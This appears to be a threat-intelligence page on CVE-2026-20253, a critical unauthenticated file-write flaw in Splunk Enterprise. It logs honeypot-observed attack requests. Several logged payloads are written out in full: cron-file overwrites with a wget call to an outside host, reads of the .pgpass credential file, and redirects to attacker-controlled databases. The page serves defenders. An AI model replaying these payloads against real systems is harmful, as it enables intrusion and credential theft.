KEVIntel
PRO Back to KEVs
9.8
CVSS
Critical

CVE-2026-20253

PUBLISHED

Unauthenticated Arbitrary File Creation and Truncation in a PostgreSQL Sidecar Service Endpoint in Splunk Enterprise

Not yet in CISA KEV

Exploited in the wild Active exploitation observed PoC available Remote Low complexity No user interaction Unauthenticated
Vendor
Splunk
Product
Splunk Enterprise, Splunk Cloud Platform
Published
Jun 10, 2026
EPSS
0.1% · 21% pctl

Automate This Intelligence with the Pro API

Everything on this page — CVSS, EPSS, exploit status, PoCs, scanner integrations, mentions, tags, and immediate honeypot data — is available programmatically for VM, SOC, and CTI workflows.

Learn about Pro

Description

In Splunk Enterprise versions below 10.2.4 and 10.0.7, and Splunk Cloud Platform versions below 10.4.2604.3 and 10.2.2510.14, an unauthenticated user could create or truncate arbitrary files through a PostgreSQL sidecar service endpoint.The vulnerability exists because the PostgreSQL sidecar service endpoint lacks authentication controls, allowing any network-reachable user to invoke file operations without credentials.

postgresql

Weaknesses (CWE)

  • CWE-306

    Missing Authentication for Critical Function

CVSS Scores

CVSS v3.1 9.8 Critical

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Exploitation Status

Exploited in the wild

Recorded 2026-06-15 05:15:25 UTC · KEVIntel

Active exploitation observed

Recorded 2026-06-15 05:15:25 UTC · KEVIntel sensor

Proof of concept available

Recorded 2026-06-12 10:04:32 UTC · GitHub

Observed Exploitation Attempts

Exploitation attempts against this vulnerability observed first-hand by KEVIntel private honeypots over the last 30 days.

High confidence Active exploitation observed
Attempts Observed
55
Unique Attacker IPs
11
Attacker Countries
🇫🇷 🇭🇰 🇰🇷 🇸🇬 🇺🇸 🇻🇳
Sensors Observed
2

Exploitation Attempts Over the Last 30 Days

Loading...

First observed 2026-06-15 05:15 UTC · Last observed 2026-06-15 16:25 UTC

Recent Attempts

Showing observations from the last 30 days.

Attack Time Attacker Sensor Request Confidence Raw Event
2026-06-15 11:53 UTC
about 8 hours ago
🇺🇸 154.16.27.85
San Jose, California, United States
Seen 24 times
🇪🇺 Splunk Enterprise
POST /en-US/splunkd/__raw/v1/postgres/query
Python-urllib/3.10
 High
View
Attacker 154.16.27.85
🇺🇸 San Jose, California, United States
Request POST /en-US/splunkd/__raw/v1/postgres/query
User-Agent Python-urllib/3.10
Payload fingerprint sha256:b48d5a01766d62ecc083c7d8d9be704d263447c8fa8c41886e8bc624fdf8d870
Payload {"database":"splunk","backupFile":"/tmp/x.bak"}
Source KEVIntel Honeypot
2026-06-15 11:53 UTC
about 8 hours ago
🇺🇸 154.16.27.85
San Jose, California, United States
Seen 24 times
🇪🇺 Splunk Enterprise
POST /en-US/splunkd/__raw/v1/postgres/databases
Python-urllib/3.10
 High
View
Attacker 154.16.27.85
🇺🇸 San Jose, California, United States
Request POST /en-US/splunkd/__raw/v1/postgres/databases
User-Agent Python-urllib/3.10
Payload fingerprint sha256:a17dca32a4d0102f39218b4dfa78e7da898d3ec182eac8c3b8c3b4ee40497628
Payload {"database":"splunk","backupFile":"/tmp/x.bak"}
Source KEVIntel Honeypot
2026-06-15 11:52 UTC
about 8 hours ago
🇺🇸 154.16.27.85
San Jose, California, United States
Seen 24 times
🇪🇺 Splunk Enterprise
POST /en-US/splunkd/__raw/v1/postgres/config
Python-urllib/3.10
 High
View
Attacker 154.16.27.85
🇺🇸 San Jose, California, United States
Request POST /en-US/splunkd/__raw/v1/postgres/config
User-Agent Python-urllib/3.10
Payload fingerprint sha256:1c94b8e9afa8b2d4811931e93e97459fdc17584f202abbf64d558717e9ac1d9a
Payload {"database":"splunk","backupFile":"/tmp/x.bak"}
Source KEVIntel Honeypot
2026-06-15 11:52 UTC
about 8 hours ago
🇺🇸 154.16.27.85
San Jose, California, United States
Seen 24 times
🇪🇺 Splunk Enterprise
POST /en-US/splunkd/__raw/v1/postgres/recovery/status
Python-urllib/3.10
 High
View
Attacker 154.16.27.85
🇺🇸 San Jose, California, United States
Request POST /en-US/splunkd/__raw/v1/postgres/recovery/status
User-Agent Python-urllib/3.10
Payload fingerprint sha256:190d64dae7e7996a265c3abdd3f3f31ee8754270e45640cd6d966f2f73485c80
Payload {"database":"splunk","backupFile":"/tmp/x.bak"}
Source KEVIntel Honeypot
2026-06-15 11:52 UTC
about 8 hours ago
🇺🇸 154.16.27.85
San Jose, California, United States
Seen 24 times
🇪🇺 Splunk Enterprise
POST /en-US/splunkd/__raw/v1/postgres/recovery/restore
Python-urllib/3.10
 High
View
Attacker 154.16.27.85
🇺🇸 San Jose, California, United States
Request POST /en-US/splunkd/__raw/v1/postgres/recovery/restore
User-Agent Python-urllib/3.10
Payload fingerprint sha256:7f2c6c5cc4c38c2ef5dc52b3b186aa26da3372a7ca168139286035f27f09f21b
Payload {"database":"splunk","backupFile":"/tmp/x.bak"}
Source KEVIntel Honeypot
2026-06-15 11:52 UTC
about 8 hours ago
🇺🇸 154.16.27.85
San Jose, California, United States
Seen 24 times
🇪🇺 Splunk Enterprise
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
Python-urllib/3.10
 High
View
Attacker 154.16.27.85
🇺🇸 San Jose, California, United States
Request POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
User-Agent Python-urllib/3.10
Payload fingerprint sha256:3334d3289048149ccd73671526f58857fdf6f6b3cddd6b648d4bc8560a8f120f
Payload {"database":"splunk","backupFile":"/tmp/x.bak"}
Source KEVIntel Honeypot
2026-06-15 11:32 UTC
about 9 hours ago
🇺🇸 154.16.27.85
San Jose, California, United States
Seen 24 times
🇪🇺 Splunk Enterprise
POST /en-US/splunkd/v1/postgres/recovery/backup
Python-urllib/3.10
 High
View
Attacker 154.16.27.85
🇺🇸 San Jose, California, United States
Request POST /en-US/splunkd/v1/postgres/recovery/backup
User-Agent Python-urllib/3.10
Payload fingerprint sha256:7831726b122264625b816d4099ff4c47438e640b78db871c02e7ac728532caa1
Payload {"database":"splunk","backupFile":"/tmp/pwned.bak"}
Source KEVIntel Honeypot
2026-06-15 11:32 UTC
about 9 hours ago
🇺🇸 154.16.27.85
San Jose, California, United States
Seen 24 times
🇪🇺 Splunk Enterprise
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
Python-urllib/3.10
 High
View
Attacker 154.16.27.85
🇺🇸 San Jose, California, United States
Request POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
User-Agent Python-urllib/3.10
Payload fingerprint sha256:f4ca239c51b4408fec83ccfdee488d3426ed9ec286ec7c9ea1e0b8259300d3a9
Payload {"database":"splunk","backupFile":"/tmp/pwned.bak"}
Source KEVIntel Honeypot
2026-06-15 11:30 UTC
about 9 hours ago
🇺🇸 154.16.27.85
San Jose, California, United States
Seen 24 times
🇪🇺 Splunk Enterprise
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
Python-urllib/3.10
 High
View
Attacker 154.16.27.85
🇺🇸 San Jose, California, United States
Request POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
User-Agent Python-urllib/3.10
Payload fingerprint sha256:e33d2664cd62bbd072fe10287e24ab4e422b320eab4bef192945df69a5fd31e6
Payload {"database": "splunk", "backupFile": "/tmp/pwned.bak"}
Source KEVIntel Honeypot
2026-06-15 10:52 UTC
about 9 hours ago
🇺🇸 107.172.77.101
Elk Grove Village, Illinois, United States
🇪🇺 Splunk Enterprise
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
CVE-2026-20253-Scanner/1.0
 High
View
Attacker 107.172.77.101
🇺🇸 Elk Grove Village, Illinois, United States
Request POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
User-Agent CVE-2026-20253-Scanner/1.0
Payload fingerprint sha256:72c6626eedcdaf3914f429fce993f51cc4c0b2e3f2bc12335b353fd4584bbfb0
Payload {"database":"search_metadata","backupFile":"cve_2026_20253_probe"}
Source KEVIntel Honeypot
2026-06-15 10:00 UTC
about 10 hours ago
🇰🇷 1.219.44.143
Uijeongbu-si, Gyeonggi-do, South Korea
Seen 4 times
🇪🇺 FortiSandbox
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup High
View
Attacker 1.219.44.143
🇰🇷 Uijeongbu-si, Gyeonggi-do, South Korea
Request POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
Payload fingerprint sha256:dec05c441b8cf7ca0bd0a115e8eaba163e7f63abd6a9d35d09d09a365819800a
Payload {"database":"hostaddr=cenkimabon.dgrh3.cn","backupFile":"/tmp/poc"}
Source KEVIntel Honeypot
2026-06-15 09:57 UTC
about 10 hours ago
🇰🇷 1.219.44.143
Uijeongbu-si, Gyeonggi-do, South Korea
Seen 4 times
🇪🇺 FortiSandbox
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup High
View
Attacker 1.219.44.143
🇰🇷 Uijeongbu-si, Gyeonggi-do, South Korea
Request POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
Payload fingerprint sha256:dec05c441b8cf7ca0bd0a115e8eaba163e7f63abd6a9d35d09d09a365819800a
Payload {"database":"hostaddr=cenkimabon.dgrh3.cn","backupFile":"/tmp/poc"}
Source KEVIntel Honeypot
2026-06-15 09:54 UTC
about 10 hours ago
🇰🇷 1.219.44.143
Uijeongbu-si, Gyeonggi-do, South Korea
Seen 4 times
🇪🇺 FortiSandbox
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup High
View
Attacker 1.219.44.143
🇰🇷 Uijeongbu-si, Gyeonggi-do, South Korea
Request POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
Payload fingerprint sha256:c896e602bd1af5f512bb121ba4b24af17289a63a96b51368232f08f5b815b678
Payload {"database":"hostaddr=fwjagyhbcy.lfcx.eu.org","backupFile":"/tmp/poc"}
Source KEVIntel Honeypot
2026-06-15 09:49 UTC
about 10 hours ago
🇰🇷 1.219.44.143
Uijeongbu-si, Gyeonggi-do, South Korea
Seen 4 times
🇪🇺 FortiSandbox
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup High
View
Attacker 1.219.44.143
🇰🇷 Uijeongbu-si, Gyeonggi-do, South Korea
Request POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
Payload fingerprint sha256:56a449534964c4146fb05a9c7f0de1efb59031a3a40573bce0a8ade2e98332b5
Payload {"database":"search_metadata","backupFile":"backuptest"}
Source KEVIntel Honeypot
2026-06-15 08:36 UTC
about 12 hours ago
🇻🇳 38.54.30.224
Hanoi, Hanoi, Vietnam
🇪🇺 Splunk Enterprise
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
python-requests/2.25.1
 High
View
Attacker 38.54.30.224
🇻🇳 Hanoi, Hanoi, Vietnam
Request POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
User-Agent python-requests/2.25.1
Payload fingerprint sha256:5ca873c668139a4db6cf7deb1f833e34e37b89f32fdb04bad29d492e1d258023
Payload {"database": "search_metadata", "backupFile": "/tmp/cve_test"}
Source KEVIntel Honeypot
2026-06-15 07:12 UTC
about 13 hours ago
🇺🇸 45.198.224.26
United States
Seen 11 times
🇪🇺 Splunk Enterprise
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
python-requests/2.31.0
 High
View
Attacker 45.198.224.26
🇺🇸 United States
Request POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
User-Agent python-requests/2.31.0
Payload fingerprint sha256:e0b9e66a806c7b596368a5489d44f04497bc2407cf082906cf4977d248b0313d
Payload {"database": "hostaddr=45.198.224.26 port=8443 dbname=pwn", "backupFile": "/tmp/.sp"}
Source KEVIntel Honeypot
2026-06-15 07:06 UTC
about 13 hours ago
🇺🇸 45.198.224.26
United States
Seen 11 times
🇪🇺 Splunk Enterprise
POST /en-US/splunkd/__raw/v1/postgres/recovery/restore
python-requests/2.31.0
 High
View
Attacker 45.198.224.26
🇺🇸 United States
Request POST /en-US/splunkd/__raw/v1/postgres/recovery/restore
User-Agent python-requests/2.31.0
Payload fingerprint sha256:d9fbe3f465f4d2c7e6943c67d9422707f0d146c68773809856ce3ce6e8de5d65
Payload {"database": "dbname=template1 passfile=/opt/splunk/var/packages/data/postgres/.pgpass", "backupFile": "/tmp/.sp"}
Source KEVIntel Honeypot
2026-06-15 07:06 UTC
about 13 hours ago
🇺🇸 45.198.224.26
United States
Seen 11 times
🇪🇺 Splunk Enterprise
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
python-requests/2.31.0
 High
View
Attacker 45.198.224.26
🇺🇸 United States
Request POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
User-Agent python-requests/2.31.0
Payload fingerprint sha256:56732e51da8fc6cb5da1d23de28011ea93e7b279ff8b2bf8873964cf39c39f2b
Payload {"database": "hostaddr=45.198.224.26 dbname=pwn", "backupFile": "/tmp/.sp"}
Source KEVIntel Honeypot
2026-06-15 05:27 UTC
about 15 hours ago
🇫🇷 62.210.127.48
Paris, Île-de-France, France
Seen 4 times
🇪🇺 Splunk Enterprise
POST /en-US/splunkd/__raw/v1/postgres/recovery/restore
python-requests/2.34.0
 High
View
Attacker 62.210.127.48
🇫🇷 Paris, Île-de-France, France
Request POST /en-US/splunkd/__raw/v1/postgres/recovery/restore
User-Agent python-requests/2.34.0
Payload fingerprint sha256:524e442263ca9fab360fddd10ccf68f171eefb438024fd6a398233beadc12e96
Payload {"database": "search_metadata", "backupFile": "/var/spool/cron/crontabs/splunk"}
Source KEVIntel Honeypot
2026-06-15 05:27 UTC
about 15 hours ago
🇫🇷 62.210.127.48
Paris, Île-de-France, France
Seen 4 times
🇪🇺 Splunk Enterprise
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
python-requests/2.34.0
 High
View
Attacker 62.210.127.48
🇫🇷 Paris, Île-de-France, France
Request POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
User-Agent python-requests/2.34.0
Payload fingerprint sha256:84a4437c3b6b64a0c8100fe8aef909bf9000103372582b5dc5e05277e7d09da6
Payload {"database": "search_metadata", "backupFile": "/var/spool/cron/crontabs/splunk"}
Source KEVIntel Honeypot
2026-06-15 05:24 UTC
about 15 hours ago
🇺🇸 45.198.224.26
United States
Seen 11 times
🇪🇺 Splunk Enterprise
POST /en-US/splunkd/__raw/v1/postgres/recovery/restore
python-requests/2.31.0
 High
View
Attacker 45.198.224.26
🇺🇸 United States
Request POST /en-US/splunkd/__raw/v1/postgres/recovery/restore
User-Agent python-requests/2.31.0
Payload fingerprint sha256:d9fbe3f465f4d2c7e6943c67d9422707f0d146c68773809856ce3ce6e8de5d65
Payload {"database": "dbname=template1 passfile=/opt/splunk/var/packages/data/postgres/.pgpass", "backupFile": "/tmp/.sp"}
Source KEVIntel Honeypot
2026-06-15 05:24 UTC
about 15 hours ago
🇺🇸 45.198.224.26
United States
Seen 11 times
🇪🇺 Splunk Enterprise
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
python-requests/2.31.0
 High
View
Attacker 45.198.224.26
🇺🇸 United States
Request POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
User-Agent python-requests/2.31.0
Payload fingerprint sha256:56732e51da8fc6cb5da1d23de28011ea93e7b279ff8b2bf8873964cf39c39f2b
Payload {"database": "hostaddr=45.198.224.26 dbname=pwn", "backupFile": "/tmp/.sp"}
Source KEVIntel Honeypot
2026-06-15 05:20 UTC
about 15 hours ago
🇫🇷 62.210.127.48
Paris, Île-de-France, France
Seen 4 times
🇪🇺 Splunk Enterprise
POST /en-US/splunkd/__raw/v1/postgres/recovery/restore
python-requests/2.34.0
 High
View
Attacker 62.210.127.48
🇫🇷 Paris, Île-de-France, France
Request POST /en-US/splunkd/__raw/v1/postgres/recovery/restore
User-Agent python-requests/2.34.0
Payload fingerprint sha256:478a4118b648ba590fc44180931675fc5cb2d7891af4e9f7884bd27fa55074ea
Payload {"database": "search_metadata", "backupFile": "/var/spool/cron/crontabs/splunk", "passfile": "/opt/splunk/var/packages/data/postgres/.pgpass", "_raw": "* * * * * wget -O- thi9a5fw.requestrepo.com\n"}
Source KEVIntel Honeypot
2026-06-15 05:17 UTC
about 15 hours ago
🇺🇸 45.198.224.26
United States
Seen 11 times
🇪🇺 Splunk Enterprise
POST /en-US/splunkd/__raw/v1/postgres/recovery/restore
python-requests/2.31.0
 High
View
Attacker 45.198.224.26
🇺🇸 United States
Request POST /en-US/splunkd/__raw/v1/postgres/recovery/restore
User-Agent python-requests/2.31.0
Payload fingerprint sha256:164ff74fdc0fe2a04587e0ad0d3978a4718113d3c61d4677c4364ac08825a5bd
Payload {"database": "dbname=template1 passfile=/opt/splunk/var/packages/data/postgres/.pgpass", "backupFile": "/tmp/splunk_poc.dump"}
Source KEVIntel Honeypot
2026-06-15 05:17 UTC
about 15 hours ago
🇺🇸 45.198.224.26
United States
Seen 11 times
🇪🇺 Splunk Enterprise
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
python-requests/2.31.0
 High
View
Attacker 45.198.224.26
🇺🇸 United States
Request POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
User-Agent python-requests/2.31.0
Payload fingerprint sha256:2e2fc3251571fa5d5aedf5bb72cacaa788aea4aa50c851d201570d4dfb0222bf
Payload {"database": "hostaddr=45.198.224.26 dbname=pwn", "backupFile": "/tmp/splunk_poc.dump"}
Source KEVIntel Honeypot

References

Known Exploited Vulnerability Sources

Catalogues that list this CVE as a known exploited vulnerability.

Source Added
KEVIntel First 2026-06-15 05:15 UTC

Scanner Integrations

Scanner Reference Detected
Nuclei https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2026/CVE-2026-20253.yaml Jun 15, 2026

Recent Mentions

Critical Splunk Enterprise Flaw Lets Attackers Run Code Without Authentication

TheHackerNews · Jun 13, 2026

Splunk has released security updates to address a critical security flaw in Splunk Enterprise that could be exploited to conduct unauthenticated file operations and even remote code execution. The vulnerability, tracked as CVE-2026-20253, is rated 9.8 on the CVSS scoring system. "In Splunk Enterprise versions below 10.2.4 and 10.0.7, an unauthenticated user could create or truncate arbitrary

Why Use App-Level Auth When Every Database Has Auth? (Splunk Enterprise CVE-2026-20253 Pre-Auth RCE)

Watchtower Labs · Jun 12, 2026

Three posts? In three days? Are we insane?We're home alone, there's no one to stop us, and we're up past bedtime. So, we need to talk about Splunk. On June 10th, Splunk published this CVE-2026-20253 advisory:It has everything that we

Potential Proof of Concepts

These PoCs are unverified and could contain malware. Use at your own risk.

HORKimhab/CVE-2026-20253

github · Created 2026-06-14 04:18:18 UTC · 0 stars

CVE-2026-20253 - Draft

0xBlackash/CVE-2026-20253

github · Created 2026-06-13 18:09:32 UTC · 0 stars

CVE-2026-20253

watchtowrlabs/watchTowr-vs-Splunk-CVE-2026-20253

github · Created 2026-06-12 10:04:32 UTC · 2 stars

Splunk Enterprise & Cloud Platform - Unrestricted File Upload

nuclei · Created Unknown

Timeline

  • Added to KEVIntel

  • Detected by Nuclei

  • Proof of Concept Exploit Available

  • CVE Published to Public

  • CVE ID Reserved